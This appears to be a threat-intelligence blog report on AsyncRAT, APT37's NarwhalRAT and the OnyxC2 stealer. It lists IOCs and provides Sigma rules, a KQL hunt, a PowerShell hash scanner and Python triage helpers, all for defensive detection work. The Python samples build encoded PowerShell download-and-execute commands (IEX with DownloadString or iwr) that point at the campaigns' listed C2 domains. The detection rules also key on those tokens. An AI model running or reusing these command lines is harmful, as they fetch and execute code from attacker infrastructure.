
AsyncRAT, APT37 NarwhalRAT & OnyxC2: OTX Pulse Analysis of Active RAT & Stealer Campaigns

Security Arsenal Team
June 15, 2026

Excerpt

Active campaigns delivering AsyncRAT via AI lures, APT37's NarwhalRAT, and OnyxC2 MaaS. High urgency due to credential theft.

Threat Summary

Recent OTX pulses indicate a surge in sophisticated Remote Access Trojans (RATs) and stealers utilizing complex initial access vectors. Three distinct campaigns have been identified:

  1. AsyncRAT (AI-Themed Lures): Threat actors are exploiting the AI hype cycle, distributing malicious files disguised as "technical guides" or learning resources. The campaign uses multi-stage infection chains involving compressed archives, LNK shortcuts, and heavy PowerShell obfuscation to deliver AsyncRAT via reflective injection and process hollowing.
  2. APT37 (NarwhalRAT): A state-aligned threat actor is targeting Korean entities with spear-phishing emails masquerading as Microsoft security alerts. The payload, delivered via ZIP archives containing LNK files, leads to the deployment of a Python-based backdoor (NarwhalRAT/ROKRAT) capable of extensive surveillance (keylogging, microphone recording) and data exfiltration via dead-drop resolvers.
  3. OnyxC2 (MaaS): A new Malware-as-a-Service (MaaS) platform, OnyxC2, has emerged on the dark web for $250/month. Written in C++ with direct syscall assembly to evade EDR, it targets over 210 applications, including password managers and 2FA extensions, signaling a commoditized threat to enterprise credentials.

Collective Objective: The primary objective across these campaigns is the theft of sensitive credentials, persistent remote access, and surveillance. The convergence of AI-themed social engineering and advanced MaaS platforms significantly lowers the barrier to entry for high-impact attacks.

Threat Actor / Malware Profile

AsyncRAT (Chinese Threat Actor)

  • Distribution: Malicious compressed archives (ZIP/RAR) containing LNK shortcuts and hidden decoy PDFs.
  • Payload Behavior: Utilizes PowerShell scripts for obfuscation. Employs reflective injection and process hollowing to evade memory scanning.
  • C2 Communication: Connects to C2 domains (e.g., shampobiskworld.nl).
  • Persistence: Uses scheduled tasks created via PowerShell.
  • Anti-Analysis: Multi-stage execution with heavy obfuscation layers.

APT37 (NarwhalRAT)

  • Distribution: Spear-phishing emails with Microsoft-themed lures, ZIP archives containing LNK files.
  • Payload Behavior: Python-based backdoor featuring keylogging, screen capture, microphone recording, and USB data collection. Uses BAT-based obfuscation.
  • C2 Communication: Leverages "dead-drop resolvers" (e.g., pcloud) to hide the actual C2 server IP.
  • Persistence: Established via registry modifications or scheduled tasks (standard for ROKRAT variants).
  • Anti-Analysis: Anti-VM techniques and LNK obfuscation.

OnyxC2 (Unknown / MaaS)

  • Distribution: Sold on cybercrime forums; payload builder generates DLLs or executables.
  • Payload Behavior: Written in C++ with Assembly for direct syscalls (bypassing user-mode API hooks). Targets 45 browsers, 109 extensions, and 5 password managers.
  • Persistence: Likely via Registry Run keys or DLL Sideloading.
  • C2 Communication: HTTP/HTTPS to custom domains.
  • Anti-Analysis: Direct syscalls to evade EDR hooks.

IOC Analysis

The provided IOCs include a mix of network and file-based indicators:

  • File Hashes (SHA256, MD5, SHA1): Critical for EDR correlation. The SHA256 hashes for AsyncRAT and OnyxC2 loaders should be blocklisted immediately. MD5 hashes are provided for the APT37 components.
  • Domains (C2/Dead-Drops): Includes shampobiskworld.nl (AsyncRAT), crwellfood.com (APT37), and akmuniverstall.top (OnyxC2). SOC teams should block these at the perimeter and DNS layer.
  • IPv4 Addresses: Specific IPs associated with APT37 infrastructure (211.239.157.126, 218.150.78.198) should be firewalled.

Operational Guidance:

  • Tooling: Use SIEM integrations to correlate the hashes against Sysmon Event ID 1 (Process Create) and EDR alerts. Feed the domains into your threat intelligence (TI) feeds so they are blocked automatically.
  • Decoding: PowerShell scripts found in these campaigns often use Base64 or XOR encoding. Ensure your automated sandboxing (e.g., Cuckoo, Triage) is configured to capture command-line arguments for decoding.
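The decoding step described above, as an added Python triage helper that is not part of the original report: it peels a -EncodedCommand argument (Base64 of UTF-16LE) and any nested FromBase64String literals from a process-creation command line, then checks the result for the tokens the Sigma rules key on and for the report's IOC domains. The command lines are constructed for illustration, and the regexes and function names are the example's own assumptions.

```python
import base64
import binascii
import re
# IOC domains from this report, and the tokens its first Sigma rule keys on.
IOC_DOMAINS = {"shampobiskworld.nl", "crwellfood.com", "akmuniverstall.top"}
SUSPICIOUS_TOKENS = ("FromBase64String", "IEX", "DownloadString")
# -e, -ec, -en, -enc and -EncodedCommand all select the same PowerShell parameter.
ENC_FLAG = re.compile(r"(?<!\S)-e(?:n(?:c(?:odedcommand)?)?|c)?\s+([A-Za-z0-9+/=]+)", re.I)
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.I)

def decode_b64_text(b64):
    """Decode one Base64 PowerShell layer; None when it is not valid Base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    # -EncodedCommand and ::Unicode.GetString carry UTF-16LE, visible as NUL bytes.
    return raw.decode("utf-16le" if b"\x00" in raw else "utf-8", errors="replace")

def triage_commandline(cmdline):
    """Peel the encoded layers of one command line and report what they contain."""
    layers = [cmdline]
    flag = ENC_FLAG.search(cmdline)
    outer = decode_b64_text(flag.group(1)) if flag else None
    if outer is not None:
        layers.append(outer)
    for _ in range(3):  # bounded: stacked FromBase64String('...') literals
        inner = B64_LITERAL.search(layers[-1])
        decoded = decode_b64_text(inner.group(1)) if inner else None
        if decoded is None:
            break
        layers.append(decoded)
    text = "\n".join(layers).lower()
    hosts = sorted(set(URL_HOST.findall(text)))
    return {"layers": len(layers), "hosts": hosts,
            "tokens": [t for t in SUSPICIOUS_TOKENS if t.lower() in text],
            "ioc_hits": [h for h in hosts if h in IOC_DOMAINS]}

# Constructed command lines modelled on the report's chains; not real telemetry.
def _enc(script):  # builds a -EncodedCommand argument (Base64 of UTF-16LE)
    return base64.b64encode(script.encode("utf-16le")).decode()
INNER = base64.b64encode(b"IEX (iwr 'http://akmuniverstall.top/p').Content").decode()
SAMPLES = [
    "powershell.exe -w hidden -enc " + _enc(
        "IEX (New-Object Net.WebClient).DownloadString('http://shampobiskworld.nl/x')"),
    "powershell.exe -nop -ec " + _enc("$p=[Text.Encoding]::UTF8.GetString("
        "[Convert]::FromBase64String('" + INNER + "'));IEX $p"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]
```

Run `triage_commandline` over each entry in `SAMPLES`; the third, benign command line yields no tokens and no hosts, which is the baseline a sandbox's command-line capture should be compared against.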

Detection Engineering

Sigma Rules

YAML
---
title: Potential AsyncRAT AI-Themed LNK Execution
id: 8a3e2c1d-5f4a-4b2e-9c1d-8f7a6b5c4d3e
description: Detects execution of LNK files from compressed archives that launch PowerShell, a technique observed in AsyncRAT campaigns using AI-themed lures.
status: stable
author: Security Arsenal
date: 2026/06/16
references:
    - https://otx.alienvault.com/pulse/6677d795f0f9a43793a657d5
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        # The LNK target launches cmd.exe, which then spawns PowerShell; matching the
        # parent here keeps every selection on the same powershell.exe event (the
        # original selections required Image to be both cmd.exe and powershell.exe).
        ParentImage|endswith:
            - \cmd.exe
            - \explorer.exe
    selection_powershell:
        Image|endswith: \powershell.exe
        CommandLine|contains:
            - 'FromBase64String'
            - 'IEX'
            - 'DownloadString'
    selection_keywords:
        # Short substrings such as 'AI' also match unrelated paths (e.g. \Main\);
        # tune to the lure file names observed in your environment.
        CommandLine|contains:
            - 'AI'
            - 'GPT'
            - 'Prompt'
            - 'Library'
    condition: all of selection_*
falsepositives:
    - Legitimate administrative scripts
level: high
---
title: APT37 NarwhalRAT Python Process Execution
id: 7b2f1e0a-4e3d-4c1b-8b2f-7e6c5d4b3a2e
description: Detects suspicious Python process execution spawning from a cmd or batch script, potentially indicating NarwhalRAT activity following LNK obfuscation.
status: stable
author: Security Arsenal
date: 2026/06/16
references:
    - https://otx.alienvault.com/pulse/6677d7f5f0f9a43793a657e6
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - \cmd.exe
            - \powershell.exe
    selection_python:
        Image|endswith: \python.exe
        CommandLine|contains: '.py'
    selection_suspicious_paths:
        CurrentDirectory|contains:
            - \AppData\Local\Temp
            - \AppData\Roaming
    condition: all of selection_*
falsepositives:
    - Legitimate Python development
level: medium
---
title: OnyxC2 Stealer Direct Syscall Process Access Pattern
id: 6c1e0d9c-3d2c-4b0a-7a1e-6d5c4b3a2e1f
description: Detects cross-process access with injection-capable rights (GrantedAccess 0x143A) whose call trace does not begin in ntdll.dll, the pattern left when a process issues syscalls directly instead of through the hooked user-mode APIs, as OnyxC2 and similar stealers do to evade EDR.
status: stable
author: Security Arsenal
date: 2026/06/16
references:
    - https://otx.alienvault.com/pulse/6677d835f0f9a43793a657f5
logsource:
    category: process_access
    product: windows
detection:
    selection:
        # 0x143A = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ |
        # PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION
        GrantedAccess: '0x143A'
    filter_ntdll:
        # Every API-based OpenProcess call enters the kernel through ntdll, so a trace
        # that starts anywhere else (the caller's own image or UNKNOWN memory) is the signal
        CallTrace|startswith: 'C:\Windows\SYSTEM32\ntdll.dll'
    filter_legit:
        SourceImage|endswith:
            - \sihost.exe
            - \svchost.exe
            - \explorer.exe
    condition: selection and not 1 of filter_*
falsepositives:
    - Security products and debuggers that ship their own syscall stubs
level: high
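To see how the `all of selection_*` condition in the rules above behaves, here is an added Python evaluator (example code, not from the report or from any Sigma tooling) that applies the AsyncRAT rule's selections to constructed Sysmon Event ID 1 records. It assumes the LNK stage shows up as cmd.exe being the parent of the powershell.exe event, and its third record shows why a short keyword such as 'AI' needs tuning: Sigma string matching is case-insensitive, so it also hits a path like C:\Main\.

```python
# Selections of the report's AsyncRAT rule, with the LNK stage expressed as
# cmd.exe being the parent of the powershell.exe process-creation event
# (assumption: the LNK target runs "cmd.exe /c ... powershell ...").
RULE = {
    "selection_lnk": {"ParentImage|endswith": "\\cmd.exe"},
    "selection_powershell": {
        "Image|endswith": "\\powershell.exe",
        "CommandLine|contains": ["FromBase64String", "IEX", "DownloadString"],
    },
    "selection_keywords": {"CommandLine|contains": ["AI", "GPT", "Prompt", "Library"]},
}

def field_matches(value, modifier, pattern):
    """Sigma string comparison is case-insensitive; a list of values means 'any of'."""
    v = str(value).lower()
    for p in (pattern if isinstance(pattern, list) else [pattern]):
        p = str(p).lower()
        if modifier == "endswith" and v.endswith(p):
            return True
        if modifier == "contains" and p in v:
            return True
        if modifier == "" and v == p:  # no modifier: exact (case-insensitive) match
            return True
    return False

def selection_matches(event, selection):
    """Every field condition inside one selection must hold (implicit AND)."""
    for key, pattern in selection.items():
        field, _, modifier = key.partition("|")
        if not field_matches(event.get(field, ""), modifier, pattern):
            return False
    return True

def evaluate(event, rule=RULE):
    """Condition 'all of selection_*': each selection must match the same event."""
    return all(selection_matches(event, sel) for sel in rule.values())

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed Sysmon Event ID 1 records for illustration; not real telemetry.
EVENTS = {
    "lnk_chain": {"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": PS,
                  "CommandLine": "powershell -w hidden IEX (New-Object Net.WebClient)"
                                 ".DownloadString('http://shampobiskworld.nl/AI_Prompt_Library')"},
    "admin_script": {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
                     "CommandLine": "powershell -File C:\\Scripts\\backup.ps1"},
    # Benign build helper: IEX plus the substring "ai" inside "C:\Main" satisfies the rule.
    "noisy_keyword": {"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": PS,
                      "CommandLine": "powershell IEX (Get-Content C:\\Main\\build.ps1 -Raw)"},
}
```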

KQL (Microsoft Sentinel)

// Hunt for AsyncRAT, APT37, and OnyxC2 Network Indicators
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ (
    "shampobiskworld.nl", 
    "shampoolagtto.com", 
    "shamppocosmaticso.com",
    "crwellfood.com",
    "fe01.co.kr",
    "akmuniverstall.top"
) 
or RemoteIP in ("211.239.157.126", "218.150.78.198")
| extend FullUrl = iff(RemoteUrl != "", RemoteUrl, RemoteIP)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort, FullUrl
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
# IOC Hunter for AsyncRAT, NarwhalRAT, and OnyxC2
# Requires Admin privileges for full disk access

$MaliciousHashes = @(
    # AsyncRAT SHA256
    "61b7fa5a7186cbf73dbc1f03e6e6f6819f5eb1e630a001059d381114bda2f974",
    "7d6ee3c6ff8f70b1817aaec82aff1d2babe0b62cafef3975262644743afc0cb8",
    "96b486bd7308ef3d6771360800f4c9b48b10697bd4cb69a8589b97b039377ecb",
    # OnyxC2 SHA256
    "78945c844fc23dd3446cf17987edeeb6cc21986820c92df82a126af24a5a38d1",
    "d89bb4b23a67814ef511e4e9dda7ad36fa519a322fa7c25ea451c7dd7ef61e54",
    "41999a3d0da035ff8068905c90235ea50121329cb0661e38d745974ebf5e3ae2",
    # APT37 / NarwhalRAT MD5
    "3715092aa00f380cefe8b4d2eddb7d08",
    "7cef19f9c4480adac0cd4702ff98f46c",
    "7eb9cee1f696727752169f25cf79a338",
    "b6b0602310bb2d4360c52685119aac1b",
    # OnyxC2 MD5
    "b5b603ff57142a454c3b0fb12eb8a4eb",
    "cf64c7e2e3897ae5fce3d5414e3d1d27"
)

Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan

$DrivesToScan = @("C:\") # Extend as needed; "C:" without the backslash only scans the current directory

foreach ($Drive in $DrivesToScan) {
    Write-Host "Scanning $Drive..."
    Get-ChildItem -Path $Drive -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        $File = $_
        try {
            $Hash = (Get-FileHash -Path $File.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
            if ($MaliciousHashes -contains $Hash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($File.FullName)" -ForegroundColor Red
            }
            # APT37 and some OnyxC2 components are listed by MD5 only; -contains is
            # case-insensitive, so the uppercase hex from Get-FileHash still matches the list
            $HashMD5 = (Get-FileHash -Path $File.FullName -Algorithm MD5 -ErrorAction Stop).Hash
            if ($MaliciousHashes -contains $HashMD5) {
                Write-Host "[!] MALICIOUS FILE FOUND (MD5): $($File.FullName)" -ForegroundColor Red
            }
        } catch {
            # Ignore unreadable files (e.g., locked by another process)
        }
    }
}

# Check for suspicious Scheduled Tasks (AsyncRAT persistence)
Write-Host "`n[+] Checking for suspicious Scheduled Tasks..." -ForegroundColor Cyan
Get-ScheduledTask | Where-Object { $_.Actions.Execute -like "*powershell*" -or $_.Actions.Execute -like "*cmd*" } | ForEach-Object {
    $Task = $_
    $Action = $Task.Actions.Execute
    $Arg = $Task.Actions.Arguments
    # Parentheses matter: -and binds tighter than -or, so without them any task carrying
    # "-w hidden" would be flagged regardless of what it executes. -e/-ec/-enc/-EncodedCommand
    # and -w/-WindowStyle hidden are the forms seen in AsyncRAT persistence.
    if ($Action -match "powershell" -and ($Arg -match "-e(c|nc|ncodedcommand)?\s" -or $Arg -match "-w(indowstyle)?\s+hidden")) {
        Write-Host "[!] Suspicious Scheduled Task: $($Task.TaskName)" -ForegroundColor Yellow
        Write-Host "    Action: $Action $Arg"
    }
}

Response Priorities

Immediate (0-4 hours)

  1. Block IOCs: Implement blocks on all listed domains and IP addresses at the firewall and proxy level.
  2. Hunt for Execution Artifacts: Run the provided PowerShell script to scan endpoints for the specific file hashes associated with AsyncRAT, NarwhalRAT, and OnyxC2.
  3. Isolate Infected Hosts: If any hashes or scheduled tasks are detected, isolate the host from the network immediately to prevent C2 communication and lateral movement.

24 Hours

  1. Identity Verification: Given OnyxC2's focus on password managers and 2FA theft, force a password reset and MFA re-enrollment for accounts that may have been accessed from potentially compromised endpoints.
  2. Log Analysis: Review Windows Security Event ID 4688 (Process Creation) and Sysmon Event ID 7 (Image Loaded) for signs of process hollowing or unusual Python executions in user directories.

1 Week

  1. Architecture Hardening:
    • Restrict PowerShell to Constrained Language Mode where possible.
    • Implement application whitelisting (e.g., AppLocker) to block unsigned executables and scripts launched from user-writable directories (%AppData%, %Temp%).
    • Prevent LNK files extracted from internet-downloaded archives from running by enforcing Mark of the Web propagation.
  2. User Awareness: Update security awareness training to specifically highlight the risks of "AI-themed" phishing lures and Microsoft-themed credential harvesting.
